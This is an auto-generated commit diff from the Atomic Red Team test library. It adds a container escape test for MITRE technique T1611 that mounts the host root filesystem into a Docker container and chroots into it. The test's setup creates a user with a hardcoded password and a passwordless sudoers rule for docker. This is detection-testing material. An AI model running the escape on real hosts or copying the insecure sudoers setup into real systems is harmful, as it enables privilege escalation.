Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1669-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1670-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -10,6 +10,7 @@ privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-4
 privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
+privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
 execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash

atomics/Indexes/Indexes-CSV/index.csv

@@ -746,6 +746,7 @@ privilege-escalation,T1055,Process Injection,12,Process Injection with Go using
 privilege-escalation,T1055,Process Injection,13,UUID custom process Injection,0128e48e-8c1a-433a-a11a-a5304734f1e1,powershell
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
+privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -184,6 +184,7 @@
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
   - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
+  - Atomic Test #3: Privilege Escalation via Docker Volume Mapping [containers]
 - T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -982,6 +982,7 @@
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
   - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
+  - Atomic Test #3: Privilege Escalation via Docker Volume Mapping [containers]
 - [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
   - Atomic Test #1: Shortcut Modification [windows]
   - Atomic Test #2: Create shortcut to cmd in startup folders [windows]

atomics/Indexes/containers-index.yaml

@@ -18122,6 +18122,51 @@ privilege-escalation:
           rm #{mount_point}#{cron_path}/#{cron_filename}
           umount #{mount_point}
           rmdir #{mount_point}
+    - name: Privilege Escalation via Docker Volume Mapping
+      auto_generated_guid: 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
+      description: |
+        This test demonstrates privilege escalation by abusing Docker's volume mapping
+        feature to gain access to the host file system. By mounting the root directory
+        of the host into a Docker container, the attacker can use chroot to operate as
+        root on the host system.
+      supported_platforms:
+      - containers
+      input_arguments:
+        username:
+          default: docker_user
+          description: Username that run attack command
+          type: string
+      dependencies:
+      - description: Docker
+        prereq_command: 'command -v docker &> /dev/null && echo "Docker is installed"
+          || { echo "Docker is not installed."; exit 1; }
+
+          '
+        get_prereq_command: 'echo "You should install docker manually."
+
+          '
+      - description: Docker Privileged User
+        prereq_command: 'sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker"
+
+          '
+        get_prereq_command: |
+          USERNAME="#{username}"
+          PASSWORD="password123"
+          SUDO_COMMAND="/usr/bin/docker"
+          SUDOERS_FILE="/etc/sudoers.d/$USERNAME"
+          [[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "Current user: #{username}"
+          sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
+        cleanup_command: 'USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME";
+          id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME
+          is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup
+          complete."
+
+          '
   T1547.009:
     technique:
       modified: '2024-10-15T13:41:16.110Z'

atomics/Indexes/index.yaml

@@ -38326,6 +38326,51 @@ privilege-escalation:
           rm #{mount_point}#{cron_path}/#{cron_filename}
           umount #{mount_point}
           rmdir #{mount_point}
+    - name: Privilege Escalation via Docker Volume Mapping
+      auto_generated_guid: 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
+      description: |
+        This test demonstrates privilege escalation by abusing Docker's volume mapping
+        feature to gain access to the host file system. By mounting the root directory
+        of the host into a Docker container, the attacker can use chroot to operate as
+        root on the host system.
+      supported_platforms:
+      - containers
+      input_arguments:
+        username:
+          default: docker_user
+          description: Username that run attack command
+          type: string
+      dependencies:
+      - description: Docker
+        prereq_command: 'command -v docker &> /dev/null && echo "Docker is installed"
+          || { echo "Docker is not installed."; exit 1; }
+
+          '
+        get_prereq_command: 'echo "You should install docker manually."
+
+          '
+      - description: Docker Privileged User
+        prereq_command: 'sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker"
+
+          '
+        get_prereq_command: |
+          USERNAME="#{username}"
+          PASSWORD="password123"
+          SUDO_COMMAND="/usr/bin/docker"
+          SUDOERS_FILE="/etc/sudoers.d/$USERNAME"
+          [[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "Current user: #{username}"
+          sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
+        cleanup_command: 'USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME";
+          id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME
+          is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup
+          complete."
+
+          '
   T1547.009:
     technique:
       modified: '2024-10-15T13:41:16.110Z'

atomics/T1611/T1611.md

@@ -14,6 +14,8 @@ Gaining access to the host may provide the adversary with the opportunity to ach
 
 - [Atomic Test #2 - Mount host filesystem to escape privileged Docker container](#atomic-test-2---mount-host-filesystem-to-escape-privileged-docker-container)
 
+- [Atomic Test #3 - Privilege Escalation via Docker Volume Mapping](#atomic-test-3---privilege-escalation-via-docker-volume-mapping)
+
 
 <br/>
 
@@ -202,4 +204,70 @@ if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Privilege Escalation via Docker Volume Mapping
+This test demonstrates privilege escalation by abusing Docker's volume mapping
+feature to gain access to the host file system. By mounting the root directory
+of the host into a Docker container, the attacker can use chroot to operate as
+root on the host system.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Username that run attack command | string | docker_user|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+echo "Current user: #{username}"
+sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
+```
+
+#### Cleanup Commands:
+```sh
+USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete."
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Docker
+##### Check Prereq Commands:
+```sh
+command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; }
+```
+##### Get Prereq Commands:
+```sh
+echo "You should install docker manually."
+```
+##### Description: Docker Privileged User
+##### Check Prereq Commands:
+```sh
+sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker"
+```
+##### Get Prereq Commands:
+```sh
+USERNAME="#{username}"
+PASSWORD="password123"
+SUDO_COMMAND="/usr/bin/docker"
+SUDOERS_FILE="/etc/sudoers.d/$USERNAME"
+[[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"
+```
+
+
+
+
 <br/>

atomics/T1611/T1611.yaml

@@ -144,6 +144,7 @@ atomic_tests:
       umount #{mount_point}
       rmdir #{mount_point}
 - name: Privilege Escalation via Docker Volume Mapping
+  auto_generated_guid: 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
   description: |
     This test demonstrates privilege escalation by abusing Docker's volume mapping
     feature to gain access to the host file system. By mounting the root directory

atomics/used_guids.txt

@@ -1698,3 +1698,4 @@ de323a93-2f18-4bd5-ba60-d6fca6aeff76
 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
 78bef0d4-57fb-417d-a67a-b75ae02ea3ab
 6cd715aa-20ac-4be1-a8f1-dda7bae160bd
+39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4